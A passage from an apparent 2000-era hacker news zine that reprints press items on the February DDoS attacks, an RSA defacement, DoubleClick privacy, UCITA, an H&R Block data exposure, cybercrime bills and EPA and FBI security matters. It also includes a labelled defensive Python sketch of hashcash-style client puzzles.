      Additionally, we note that "nigs" should not be construed to express any 
      racist sentiments, but is best       understood as a term of fraternal 
      affection along lines expressed by the familiar "homies".

      In the interests of investigative journalism we visited the #2600 and 
      #sesame channels on irc.segments.org, following the message's
      reference to that network, but found ourselves alone with a bot which 
      advised us, "Welcome to #2600 sit down and shuddup or fear a nice /kill or 
      /kline."

      
      A subsequent visit to the same two channels on the more h4x0r-friendly 
      efnet.org yielded the expected result, two rooms chock full of quiet, 
      paranoid hackers and eager, chatty wannabes.

      
      No one volunteered any information which The Register felt was up to its 
      impeccable standards of journalistic dependability, so we must refrain 
      from passing along speculation proffered by anonymous strangers.

      The hack follows closely on the heels of RSA's boastful announcement last 
      week that it was developing some new magic bullet to thwart DDoS
      attacks. The idea behind it is clever, we must allow: a cryptographic 
      technique using so-called "client puzzles" which would accompany 
      connection requests.

      "During an attack, legitimate clients would experience only a small 
      degradation in connection time, while the attacking party would
      require vast computational resources to sustain an interruption of 
      service. As a result, the subsequent burden of numerous requests placed 
      back on the attacking party would severely limit its ability to continue 
      the attack," RSA says.

      
      Of course the selection of RSA's home page for a graffiti attack could be 
      a mere coincidence, or it could be a reply from the hacking underground 
      meant to remind the company, and the rest of us by extension, that, all 
      boasting aside, if you are connected to the Internet, you can be hacked, 
      one way or another.

      
      A worthwhile reminder for all of us, we must add. 


      (It's articles like this one from The Register that make me sure that
      archiving this material is a worthy cause, it's priceless ... ;) - Ed )
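
      The "client puzzles" idea quoted in the Register piece above, sketched
      as an added example (it is not RSA's construction and not part of the
      original articles): a hashcash-style puzzle in which the server issues
      a stateless, HMAC-bound challenge with each connection request and the
      client must find a counter whose SHA-256 hash has a set number of
      leading zero bits. Function names, the 60-second lifetime, the secret
      and the sample address are assumptions made for illustration.

```python
import hashlib
import hmac
import struct

MAX_AGE = 60  # seconds a puzzle stays valid (assumed value)


def _leading_zero_bits(digest):
    """Count the leading zero bits of a byte string."""
    bits = 0
    for byte in digest:
        if byte == 0:
            bits += 8
            continue
        bits += 8 - byte.bit_length()
        break
    return bits


def _challenge(secret, client_addr, issued, difficulty):
    # Binding address, issue time and difficulty into the MAC means the
    # server keeps no per-request state and a client cannot reuse a puzzle
    # from another address or lower the difficulty it was given.
    msg = "{}|{}|{}".format(client_addr, issued, difficulty).encode()
    return hmac.new(secret, msg, hashlib.sha256).digest()


def issue_puzzle(secret, client_addr, now, difficulty):
    """Server side: one HMAC per incoming request, nothing stored."""
    return {
        "challenge": _challenge(secret, client_addr, now, difficulty),
        "issued": now,
        "difficulty": difficulty,
    }


def solve_puzzle(puzzle):
    """Client side: brute force, about 2**difficulty hashes on average."""
    counter = 0
    while True:
        digest = hashlib.sha256(
            puzzle["challenge"] + struct.pack(">Q", counter)
        ).digest()
        if _leading_zero_bits(digest) >= puzzle["difficulty"]:
            return counter
        counter += 1


def verify_solution(secret, client_addr, puzzle, solution, now):
    """Server side: one HMAC and one hash, however hard the puzzle was."""
    if not isinstance(solution, int) or not 0 <= solution < 2 ** 64:
        return False
    expected = _challenge(
        secret, client_addr, puzzle["issued"], puzzle["difficulty"]
    )
    # Reject puzzles the server never issued to this address with these
    # parameters (forged challenge, edited timestamp or difficulty).
    if not hmac.compare_digest(expected, puzzle["challenge"]):
        return False
    # Reject stale puzzles so solutions cannot be stockpiled in advance.
    if not 0 <= now - puzzle["issued"] <= MAX_AGE:
        return False
    digest = hashlib.sha256(
        puzzle["challenge"] + struct.pack(">Q", solution)
    ).digest()
    # A solved puzzle can still be replayed until it expires; a deployment
    # would also remember accepted solutions for MAX_AGE seconds.
    return _leading_zero_bits(digest) >= puzzle["difficulty"]


if __name__ == "__main__":
    secret = b"constructed-demo-secret-not-real"  # constructed sample key
    for difficulty in (8, 12, 16):
        puzzle = issue_puzzle(secret, "192.0.2.10", 1000, difficulty)
        solution = solve_puzzle(puzzle)
        ok = verify_solution(secret, "192.0.2.10", puzzle, solution, 1005)
        print("difficulty", difficulty, "hashes tried", solution + 1, ok)
```

      Raising the difficulty by one bit doubles the client's expected work
      while the server's cost to issue and verify stays constant, which is
      the asymmetry the RSA statement describes.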
       
      @HWA       
       
      
49.0  HNN:Feb 15th:Doubleclick Announces New Privacy Plan
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Joey 
      
      Based in New York, DoubleClick is the nation's largest Internet ad
      agency, electronically inserting advertisements on about 1,500 Web
      sites. Last fall the company bought direct-marketing company Abacus for
      $1.7 billion, and recently started to cross-reference information
      obtained by cookies with consumer information from the Abacus marketing
      database. DoubleClick has now unveiled an advertising campaign that
      attempts to portray itself as a consumer-friendly company that goes out
      of its way to protect consumers' privacy. The company will place 50
      million banner advertisements on Web sites, and retain
      PricewaterhouseCoopers to start independent audits of its privacy
      practices. However, they will continue to match surfing habits with
      purchasing decisions.
      
      Associated Press - via Detroit Free Press
      http://www.freep.com/business/web15_20000215.htm
      
      Ad firm fuels debate over
      Web privacy 

      DoubleClick says it does not spread
      consumers' data 

      February 15, 2000

      ASSOCIATED PRESS

      On-line advertising agency DoubleClick launched a
      counterattack Monday against repeated
      accusations that it invades consumers' privacy on
      the Internet, but the effort exacerbated a clash with
      privacy advocates seeking a government
      clampdown.

      The widened rift underscores the increasing
      controversy between a marketing industry eager to
      harness the Internet's power to reach customers
      and those who fear the intrusion to people's
      confidential information, such as spending habits,
      health status and product preferences.

      New York-based DoubleClick is the nation's
      largest Internet ad agency, electronically inserting
      advertisements on about 1,500 Web sites. But last
      fall the company bought direct-marketing company
      Abacus for $1.7 billion, irking privacy advocates
      with plans to cross-reference information obtained
      by Web "cookies" with consumer information from
      the Abacus marketing database.

      A cookie is a small file a Web site deposits on your
      hard drive, often with a number that identifies the
      user's computer. The next time someone using that
      computer goes back to the site, the site recognizes
      the computer.

      DoubleClick, targeted in a lawsuit filed last month
      and a complaint filed with the Federal Trade
      Commission last week, is accused of seeking to
      build virtual dossiers on unwitting consumers'
      buying habits and identities, with the intent to sell
      the data to advertisers who can barrage people
      with ads.

      DoubleClick fought back Monday, unveiling an
      advertising campaign that attempts to portray itself
      as a consumer-friendly company that goes out of its
      way to protect consumers' privacy.

      Measures include placing 50 million banner
      advertisements on Web sites, making it easier for
      Web users to opt out of giving marketers
      confidential details about their shopping habits.
      DoubleClick also said that
      PricewaterhouseCoopers would start
      independent audits of its privacy practices.

      Yet, privacy advocates immediately termed the
      DoubleClick effort window dressing, saying it
      avoids the main issue: linking information users
      believed was anonymous with a database of names
      and consumer buying habits.

      The Electronic Privacy Information Center, an
      advocacy group in Washington, filed the complaint
      with the FTC. The group also is pushing for federal
      legislation that would regulate the use of personal
      information and cookies on the Internet.

      The conflict puts DoubleClick at the vortex of a
      wider debate over how far businesses should go to
      target consumers.
      
      
      @HWA 
      	
      	
50.0  HNN:Feb 16th:UCITA Passes In Virginia
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Erik 
      
      The Virginia House of Delegates on Monday unanimously passed the Uniform
      Computer Information Transactions Act.  Among other things UCITA allows
      software companies to 'repossess' software or to turn it off remotely.
      (What is surprising is that it passed unanimously. Do AOL and other
      software companies have that much influence in VA?)
      
      InfoWorld
      http://www.infoworld.com/articles/ec/xml/00/02/14/000214ecucita.xml
      (*yawnfest*, dry reading, for article follow link... - Ed)     
      
       
      @HWA
      
51.0  HNN:Feb 16th:Read Our Lips: No New Net Laws
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            
      From HNN http://www.hackernews.com/      
       
      contributed by janoVd 
      
      Executives from the nation's leading Internet companies told President
      Clinton at the White House yesterday that despite a perceived increase in
      Internet related crime, they saw no need for an increase in government
      regulation of the industry. (YEAH!)
      
      NY Times
      http://www.nytimes.com/library/tech/00/02/biztech/articles/16net.html
      (Pay to play site, anyone have an account here?)
      
      CNN
      http://www.cnn.com/2000/TECH/computing/02/15/hacker.security/
      
      
      Clinton fights hackers, with a hacker

      February 15, 2000
      Web posted at: 1:51 p.m. EST (1851 GMT)

      From staff and wire reports

      WASHINGTON -- Searching for ways to improve security on the Internet, 
      President Bill Clinton convened a meeting at the White House on Tuesday 
      with technology experts that included a hacker named Mudge. 

      Saying security on the Internet should be improved without jeopardizing 
      the entrepreneurial potential of e-commerce, the president endorsed a $9 
      million proposal to create a high-tech security institute. 

      "We know we have to keep cyberspace open and free," Clinton said. "At the 
      same time, computer networks (must be) more secure and resilient and we 
      have to do more to protect privacy and civil liberties." 

      The meeting follows a blizzard of assaults last week that disabled some of 
      the nation's most popular Web sites, among them CNN.com, eBay, Yahoo, 
      Amazon.com and E*Trade. 

      Republican lawmakers have criticized related Clinton proposals in the 
      past, saying they have not done enough to protect federal computer 
      systems. 

      But U.S. Secretary of Commerce William Daley, who took part in the 
      session, said the U.S. government can "lead by example" to ensure national 
      networks are secure. 

      "The tools are out there, but not many companies are taking advantage of 
      them. We in government can provide an example by getting our own house in 
      order," he told reporters.

      Sun, MCI, IBM and Mudge

      The president invited more than a dozen computer executives and
      academics who specialize in computer technology to the session.
      Companies represented included America Online, Yahoo!, 3Com, Cisco
      Systems, Sun Microsystems, MCI Worldcom, IBM, AT&T, Hewlett Packard,
      Intel and Microsoft, said White House spokesman Joe Lockhart.

      Among the participants was Mudge, nickname for a member of a "think
      tank" of hackers who perform security consulting under the name @Stake.
      The White House released a list of participants that included an @Stake
      representative named Peiter Zatko.

      Mudge, in a business suit with his long brown hair hanging down on his
      chest, sat quietly with his fingers interlocked atop his blue briefing
      books. He is also a member of the celebrated hacker group L0pht Heavy
      Industries, based in Massachusetts.

      Another participant, Whitfield Diffie of Sun Microsystems, set up his 
      laptop on the conference table, an agenda on the screen. 

      No 'electronic Pearl Harbor'

      The initial idea of the meeting was to address the problem of terrorists 
      using cyberspace. But Clinton said the attacks last week underscore a need 
      for the government to focus on protecting the Internet itself. 

      "These denial-of-service attacks are obviously very disturbing and I think 
      there is a way that we can clearly promote security," Clinton told CNN.com 
      Monday in an online interview. 

      But Tuesday he cautioned that the attacks were not an "electronic Pearl 
      Harbor." 

      "I don't think we should leave here with this vast sense of insecurity," 
      Clinton said at the Tuesday meeting. "We ought to leave here with a sense 
      of confidence that this is a challenge that was entirely predictable. It's 
      part of the price of the success of the Internet." 

      Summit also tackles cyberterrorism

      Lockhart said beforehand that the participants mainly would review 
      Clinton's $2 billion proposal for protecting the nation's computer 
      infrastructure from sabotage; about $91 million of that would go toward 
      addressing cyberterrorism. 

      "The meeting is not to come out with new budget numbers or detailed policy 
      initiatives. It's to make sure we are on the right track," Lockhart said. 
      "One of the goals the president has is to make sure that each of these 
      important companies is talking within their industry about what they can 
      do." 

      One challenge for vulnerable companies is how to share warnings on attacks 
      without causing undue panic or releasing corporate secrets. 

      Managers of a recently formed private security network for banks said 
      computer experts at some of the nation's largest financial institutions 
      received detailed warnings of impending threats days before last week's 
      attacks began on major sites. 

      Hacking warnings not passed to FBI

      But banking officials never passed those warnings to the FBI or other law 
      enforcement agencies, because they weren't allowed to do so under rules of 
      the unusual security arrangement, formed with the government's 
      encouragement. 

      To encourage open participation by banks and other financial firms, the 
      Treasury Department decided that information disclosed within such a 
      network would not be turned over to federal regulators or law enforcement 
      agencies. It worked well for the banks that were forewarned about the 
      attacks last week but the system also ensured the same warnings were not 
      widely distributed. 

      The banking network issued the first alert in the latest attacks on 
      February 4, "when we started seeing certain machines being compromised," 
      said William Marlow of Global Integrity Corp., which runs the network. 
      Yahoo! was attacked four days later. 

      America Online is awaiting approval of a merger with Time-Warner, the 
      parent company of CNN. 

      Correspondents Steve Young, Major Garrett and The Associated Press 
      contributed to this report.
      
      
      @HWA
      
52.0  HNN: Feb 16th:Tax Returns Inadvertently Made Public
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by acopalyse 
      
      H&R Block's online tax filing service exposed at least 50 people's
      sensitive financial records to other customers last weekend, prompting
      the company to shut down the system yesterday afternoon. H&R Block said
      that the glitch only affected web filers and that the system would remain
      offline until it was fixed.
      
      C|Net
      http://news.cnet.com/news/0-1005-200-1550948.html
      
      
      Breach exposes H&R Block customers' tax records
      By Courtney Macavinta
      Staff Writer, CNET News.com
      February 15, 2000, 7:10 p.m. PT

      H&R Block's online tax filing service exposed some customers' sensitive
      financial records to other customers last weekend, prompting the company
      to shut down the system yesterday afternoon, CNET News.com has
      learned.

      The company's Web-based tax preparation service, which is the premier 
      sponsor of Yahoo's Tax Center, experienced a technical glitch that 
      accidentally switched some tax filers' records, H&R Block confirmed today. 
      As a result, when some registered users signed on to the service to
      work on their tax returns, they instead received someone else's 
      filing--including a social security number, home address, annual income 
      and other highly sensitive information.

      "What we discovered was that some of our clients' data was appearing in 
      other clients' data files," said Linda McDougall, vice president of 
      communications for H&R Block. "We're keeping it down until we're convinced 
      that the problem has been corrected."

      McDougall emphasized that the problem only affected the Web-based 
      preparation and filing of returns. Taxes processed with H&R Block's 
      preparation software or at one of the company's offices were not       
      exposed, she said. 

      The software glitch revealed the confidential records of at least 50 
      people, although the full extent of the problem will not be known until 
      the company completes an internal audit, McDougall said. She added       
      that at least 10 customers have contacted the company about the problem. 

      "Once we determined this, we took our system offline immediately and we 
      began an audit of our entire customer database," McDougall said.

      "We're confident that it wasn't due to a hacker--we feel that it was a 
      software problem within our system," she added. "No return has been filed 
      to the Internal Revenue Service that contains inaccurate data."

      This is the second time in two weeks that H&R Block's $9.95 
      "Do-it-yourself" Net filing service--which more than 300,000 people have 
      used so far this year--has suffered a technical problem and had to be       
      shut down. H&R Block expects to handle more than 650,000 returns via the 
      Net this year.

      Other Web sites also have had security concerns in recent months. For
      example, RealNames, a company that substitutes complicated Web addresses
      with simple keywords, warned its users last week that its customer
      database had been hacked, and that user credit card numbers and
      passwords may have been accessed.

      The H&R Block privacy breach was no doubt startling to some users who
      chose the 40-year-old company over other online services, such as
      Intuit's TurboTax software. User anxiety was intensified because it
      occurred on the weekend, making it difficult to locate an H&R Block
      employee who could address the problem.

      Joshua Kasteler of the San Francisco Bay area said he was tackling his EZ 
      1040 on Sunday when the H&R Block system started to act sluggish. Kasteler 
      logged off, and when he signed on to the password-protected site an hour       
      later, he was given access to the records of another H&R Block customer.

      "Instead of my information, it was a gentleman from Texas who worked for 
      Advanced Micro Devices," Kasteler said, noting that the forms also listed 
      the other person's phone number, address, social security number and 
      annual income. "I assumed that someone else has my information, too,
      because this guy's information fell into my lap. I had this guy's life."

      Kasteler said he emailed and called H&R Block but still had not heard back 
      from the firm as of late today. So he decided to call the man whose 
      information he had accessed: James Keech, a maintenance technician who 
      also had trouble with the H&R Block site and had been unable to
      process his return since Thursday.

      "When (Kasteler) called, I was freaking," Keech said. "I was like, 'If 
      he's got it, how many other people have my file and aren't being honest 
      and letting me know.' "

      Keech said he called H&R Block and was told that there had been a security 
      problem. He has asked that his data be deleted from the system.

      "I'll probably go to a regular tax filing office now," he said. "It would 
      have been easier to fill it out on paper."

      The 1040 EZ is a simplified IRS form that does not include information 
      such as itemized deductions, capital gains or rental income. 

      H&R Block's privacy policy states that "information contained in your tax 
      return will be treated with extreme care and confidence...we will never 
      disclose any tax return information without your consent." Like many Web 
      sites, however, the policy doesn't address information that is
      accidentally disclosed without permission.

      With the growth of the Net, consumer advocates have been pushing for 
      umbrella data-protection laws to safeguard U.S. computer users, who may be 
      giving up more information in the digital age that makes them vulnerable 
      to fraud and
      privacy breaches. 
      
      
      @HWA
      

53.0  HNN:Feb 16th:AOL Intruder Sentence Increased
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
       
      contributed by Erik 
      
      When Jay Satiro was sentenced for intruding into AOL computer systems
      last December his sentence banned him from computer use but left
      exceptions for employment and education uses.  Judge John Perone has now
      removed those exceptions, and has ordered his mother to use a portable
      computer that can be locked up away from Mr. Satiro. (Just how the
      hell is this guy expected to contribute to society if he can not even
      touch a computer?)
      
      NY Times
      http://www.nytimes.com/aponline/f/AP-AOL-Hacked.html
      (pay to play...)
      
      @HWA
      
54.0  HNN:Feb 16th:China Denies Defacing Japanese Sites
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Evil Wench 
      
      Foreign Ministry officials in China have said that there is no way to
      confirm that recent attacks on various Japanese web sites have originated
      in China. Officials have reaffirmed their opposition to such behavior.
      
      Reuters - via Excite
      http://news.excite.com/news/r/000215/05/net-japan-hackers
      (Server: "We're sorry, but this story is not currently available" -Ed )
      
      
      
      
      @HWA
      
55.0  HNN:Feb 16th:Tulsa Police Break Up Online 'Gang'
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Anonymous 
      
      Police in Tulsa, Oklahoma have raided two area youngsters who are
      believed to have stolen credit card numbers and crashed two Oklahoma web
      sites.  After the information on the confiscated equipment is analyzed
      arrests may be made.
      
      KOTV
      http://www.kotv.com/pages/viewpage.asp?id=3182
      
      
      @HWA
      
56.0  HNN:Feb 17th:Feds still nvestigating
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
       
      contributed by ben 
      
      In the classic slow style of the US Government, federal law enforcement
      officials are still investigating last week's denial of service attacks.
      Sources close to the investigation have said that they are following
      "very strong leads". The names of mafiaboy, coolio, and machoman have
      been mentioned in numerous media outlets but no hard evidence yet links
      them to the crimes.
      
      Associated Press - via Excite
      http://news.excite.com/news/ap/000216/17/news-hacker-attacks
      (unavailable...)
      
      CNN - video
      http://cnn.com/videoselect/#     
      
      
      @HWA
      
57.0  HNN:Feb 17th:Correction: UCITA Did Not Pass In VA, Yet.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by White Vampire 
      
      Yesterday HNN incorrectly reported that the Virginia Legislature passed
      into law the Uniform Computer Information Transactions Act.
      They did pass joint resolutions HJ277 and SJ239 which will create a
      joint subcommittee to study the UCITA and its language.
      
      Slashdot
      http://slashdot.org/comments.pl?sid=00/02/14/2221203&cid=378
      
       
      Late Update 11:50
      
      Well it would seem that interpreting legal jargon within the State
      legislature of Virginia is a little more difficult than first thought.
      It would now appear that UCITA did in fact make it into law by amending
      Title 59.1.  But here, read it for yourself:
      
      House Bill 561: Creates the Uniform Computer Information Transactions
      Act (UCITA). UCITA was promulgated by the National Conference of
      Commissioners on Uniform State Laws (NCCUSL).
      Passed 95-2, 1 abstain.

      Senate Bill 372: Creates the Uniform Computer Information Transactions
      Act (UCITA). UCITA was promulgated by the National Conference of
      Commissioners on Uniform State Laws (NCCUSL).
      Passed 39-0
      
      
      
      @HWA
      
      
58.0  HNN:Feb 17th:Defense Message System Has Serious Holes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Evil Wench 
      
      During operational tests of the $1.6 million Defense Message System
      software Version 2.1, an information warfare test team "was able to
      penetrate all but one test site with only a moderate level of effort,"
      according to the DOD's 1999 annual OT&E report, released this week. The
      test was conducted last year by the Defense Department's Office of
      Operational Test and Evaluation. As a result of the failure, the
      Pentagon's OT&E director concluded that DMS Version 2.1 was "not
      operationally effective."
      
      Federal Computer Week
      http://www.fcw.com/fcw/articles/2000/0214/web-dms-02-16-00.asp
      
      DMS security cracked during testing

      BY Daniel Verton 02/16/2000 

      Information warfare tests conducted in September 1999 on the Pentagon's 
      $1.6 billion Defense Message System found serious deficiencies in the 
      system's security protections.

      During operational tests of DMS software Version 2.1, conducted last year 
      by the Defense Department's Office of Operational Test and Evaluation, an 
      information warfare test team "was able to penetrate all but one test site 
      with only a moderate level of effort," according to the DOD's 1999 
      annual OT&E report, released this week. As a result of the failure, the 
      Pentagon's OT&E director concluded that DMS Version 2.1 was "not 
      operationally effective."

      DMS was scheduled to replace the Pentagon's aging Automatic Digital 
      Network (Autodin) message system at the end of last year. Developed in the 
      1960s, Autodin passes message traffic through a global network of highly 
      secure but antiquated mainframes that use tape reels for data 
      storage.

      Plans for DMS deployment include installing the software on more than 
      360,000 desktops at more than 7,000 locations throughout the department.

      According to the report, the inability of system administrators to 
      adequately set up and configure DMS software securely led to gaps in 
      network security that were easily breached. Evaluators also blamed the 
      problem on the complexity of the software.

      "The underlying factors are the complexity of DMS, the need to reconfigure 
      DMS to integrate it with each distant site's supporting architecture and 
      the lack of automated aids to check DMS security posture once it is 
      installed or after it is reconfigured," the report stated.


      
      
      @HWA
      
59.0  HNN:Feb 17th:CIA Startup Works on Net Security
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
       
      contributed by Evil Wench 
      
      In-Q-Tel, the CIA's recently formed venture capital fund, has entered
      into a $3 million contract with Science Applications International Corp.
      (SAIC) for development of software designed to protect Web sites against
      DoS attacks and to make computer addresses invisible to sniffers.
      
      Washington Post
      http://search.washingtonpost.com/wp-srv/WPlate/2000-02/16/106l-021600-idx.html
      (404)
      
      @HWA
      
60.0  HNN:Feb 20th:Bill Will Double Title 18 Penalties
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Evil Wench 
      
      Sen. Kay Bailey Hutchison, R-Texas will be introducing a bill next week
      that will alter Title 18 of the US Criminal Code to double the current
      five-year penalty for engaging in "fraud or related activity in
      connection with computers." The bill will also create the establishment
      of a National Commission on Cyber security,  which would be given six
      months to present findings on protecting computers from malicious
      attacks. (Show me one case where increased penalties would have made a
      difference.)
      
      Computer Currents
      http://www.currents.net/newstoday/00/02/17/news4.html
      
      News Story
      Bill To Double Hacker Sentences
      By: Robert MacMillan, Newsbytes. February 17, 2000
      URL: http://www.currents.net/newstoday/00/02/17/news4.html

      Penalties for malicious hackers who crack private computers would double 
      if Sen. Kay Bailey Hutchison, R-Texas, can move her new bill successfully 
      through the Senate.

      Hutchison next week is expected to introduce legislation that would alter 
      Title 18 of the US Criminal Code to double the current five-year 
      penalty for engaging in "fraud or related activity in connection with 
      computers."

      Hacking penalties would increase from five to 10 years for the first 
      offense, and from 10 to 20 years for the second offense.

      The legislation also would establish a National Commission on 
      Cybersecurity, which would be given six months to present findings on 
      protecting computers in the Internet age from wired misappropriation.

      Hutchison's legislation, along with a planned measure announced in a 
      Senate subcommittee today by House Judiciary Committee Ranking Member 
      Patrick Leahy, D-Vt., represents two of the initial congressional 
      responses to the spate of denial-of-service attacks that took down several       
      well-known Web sites last week.

      "Current law treats computer hackers like harmless 'thrill seekers' when 
      in reality they are reckless drivers on the information superhighway," 
      Hutchison said. "It is clear they now have the capability to disrupt 
      service to millions of Americans and cause countless dollars in damages to 
      US business."

      Hutchison's bill, a spokesperson told Newsbytes, likely will establish 
      monetary penalties based on the amount of damage done to corporate 
      Websites, but also would figure in "pain and suffering-style" costs for 
      the amount of damage to the public caused by cracks and other kinds of 
      computer assaults.

      "When you define damage...it might be a little unclear," the spokesman 
      said, using a hypothetical example of eBay and $5,000. "Did it cost eBay 
      $5,000 to simply fix the service outage, versus 'Did we lose $5,000 in 
      lost opportunities, market capitalization and customer dissatisfaction?'"

      Hutchison has been active in several other high-tech legislative 
      initiatives, including the introduction of S. 1660 in September 1999, a 
      bill that establishes cyberstalking penalties. That bill is awaiting a 
      hearing in the Senate Judiciary Committee, while a mirror version of the 
      bill introduced by Rep. Sue Kelly, R-N.Y., passed the House.

      Hutchison also is co-chairman of the Senate Republican High-Tech 
      Taskforce, along with nearly defunct Y2K Committee Chairman Robert 
      Bennett, R-Utah. She also serves as the chairman of the Senate Commerce 
      Subcommittee on Science, Technology and Space.

      Bennett has proposed to Senate Majority Leader Trent Lott that the Senate 
      establish a cyberterrorism and Internet security committee after the Year 
      2000 Committee's demise.

      Reported by Newsbytes.com

      
      
      @HWA
      
61.0  HNN:Feb 20th:Racketeering Charges Sought for Cyber Criminals
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Weld Pond 
      
      FBI Director Louis Freeh told a Senate subcommittee Wednesday that online
      criminals should be considered racketeers and hit with lengthy prison
      terms if it can be proven the assaults were part of an extensive,
      organized criminal enterprise.  Federal racketeering, or RICO, laws have
      traditionally been used to prosecute mobsters and drug cartels.
      (Again, when have increased penalties affected the number of crimes
      committed? Why don't we spend more time on prevention. Or have we
      given up on that already?)
       
      USA Today
      http://www.usatoday.com/news/washdc/ncswed02.htm
      (incorrect story url linked... - Ed)
      
      @HWA
      
62.0  HNN:Feb 20th:Serious Online Security Issues Found at EPA
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Evil Wench 
      
      A General Accounting Office audit team reported to the House Commerce
      committee that they found "serious and pervasive problems" with the
      information security implementation of the EPA Systems. The GAO audit
      team was able to penetrate systems that held sensitive and national
      security-related information. In response to this report the GAO has
      temporarily shut down all of their web sites for fear of cyber attack.
      
      Fundamental Weaknesses Place EPA Data and Operations at Risk - PDF
      http://www.gao.gov/new.items/ai00097t.pdf
      
      
      Federal Computer Week
      http://www.fcw.com/fcw/articles/2000/0214/web-epanetwork-02-18-00.asp      
      
      ZDNet - via Yahoo
      http://dailynews.yahoo.com/h/zd/20000218/tc/20000218057.html
      (404)
      
      
      Federal Computer Weekly:
      
      
      Network security problems at EPA "serious and pervasive"

      BY Diane Frank and Paula Shaki Trimble 02/18/2000 

      The Environmental Protection Agency late Tuesday temporarily shut down all 
      access to the Internet following revelations that the agency's information 
      systems and policies suffered from fundamental security weaknesses.

      The decision to temporarily terminate access to the agency's public and 
      private systems came after a General Accounting Office audit team 
      performing security testing at EPA reported to the House Commerce 
      committee that they found "serious and pervasive problems that 
      essentially render EPA's agencywide information security program 
      ineffective."

      The types of problems GAO found -- including improperly configured 
      firewalls, vulnerabilities that allowed GAO to take control of EPA's major 
      systems, and a reliance on insecure password controls -- are issues that 
      every federal agency experiences, but not to this extent, said David 
      McClure, associate director of governmentwide and defense information 
      systems in GAO's Accounting and Information Management Division.

      "The scope and the severity of the weaknesses at EPA were more extensive 
      than we've seen," McClure said.

      The EPA systems GAO penetrated hold sensitive and national 
      security-related information. They include the National Computing Center's 
      mainframe in Research Triangle Park, N.C., which is one of the systems the 
      White House named in 1998 as critical to defending against 
      cyberattacks.

      "We knew their lack of security was bad. We didn't know how bad," 
      committee spokesman Steve Schmidt said. "We felt we had no choice but to 
      force EPA's hand if they did not shut down the site."

      EPA maintained that the shutdown is only temporary.

      "Our access to the Internet as well as public access has been temporarily 
      suspended while [the National Technology Services Division] implements 
      security measures," said Jerry Slaymaker, senior advisor to the EPA chief 
      information officer. Slaymaker said the agency hopes to restore 
      limited Internet access by Feb. 22.

      The agency had to shut down the Internet site in addition to its internal 
      network because "we have to go to the place where entrance is being gained 
      or potentially can be gained through the Web site," Slaymaker said. There 
      is no way to repair the front door without limiting all access, he 
      said.

      "Public access to information is a serious part of the agency's business,"
       he said. "The only thing more important is security of the information."
       
      
      
      @HWA
      
63.0  HNN:Feb 20th:FBI Reveals ACES
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by xx cu se me 
      
      In testimony before the Senate Appropriations Subcommittee on Wednesday,
      FBI Director Louis Freeh revealed a new program the agency calls the
      Automated Computer Examination System. ACES allows investigators to
      examine huge areas of magnetic media quickly looking for forensic
      evidence on computer crimes. This new system was developed in response to
      the ever increasing size of hard drives today that vastly increases the
      area that needs to be searched.
      
      The Register UK
      http://www.theregister.co.uk/000217-000003.html
      
      
      Posted 17/02/2000 10:53am by Thomas C. Greene in Washington
      
      How the FBI can r00t your hard drive
      
      The FBI is working hard to establish itself as the world's premier computer forensics expert. 
      
      The Bureau has deployed 193 Special Agents devoted specifically to cyber crime, along with 
      more than 100 related support personnel at FBI Headquarters in Washington, and 142 "parts 
      examiners" busily recovering data from seized computers in the field, FBI Director Louis 
      Freeh told the Senate Appropriations Subcommittee Wednesday. 
      
      "These are people who can take evidence off a hard drive that even fairly sophisticated users
      would think had been erased," Freeh explained.
      
      Most computers sold in 1998 featured hard drives of six to eight GB capacity. But by the end 
      of this year, sixty to eighty GB hard drives will be common, he noted -- and with considerable
      exaggeration, we observe. To tell the truth, twenty to forty GB hard drives will be "common" 
      towards the end of this year. Sixty to eighty... well, that will remain in the realm of "dream
      boxes" for some time to come. 
      
      In any event, the continuing development of big HDDs "vastly increases the area that needs to 
      be searched", he complained. 
      
      Yet there is hope on the horizon. The FBI has developed a program it calls the Automated 
      Computer Examination System (ACES), which allows investigators to examine huge areas of 
      magnetic media quickly, Freeh revealed.  
      
      This, combined with the FBI's Computer Wizards' ambition to "de-centralise computer 
      examination," should eventually yield an efficient mechanism for lifting data from 
      confiscated boxes, he reckons. 
      
      One putatively successful effort along these lines is a collaboration between the FBI and 
      the San Diego Regional Computer Forensics Laboratory. 
      
      This de-centralised approach is supposed to increase the Bureau's efficiency in forensic
      investigation. New centres are planned for New England and Texas, and ought to be running
      soon, Freeh said. 
      
      @HWA
      
      
      
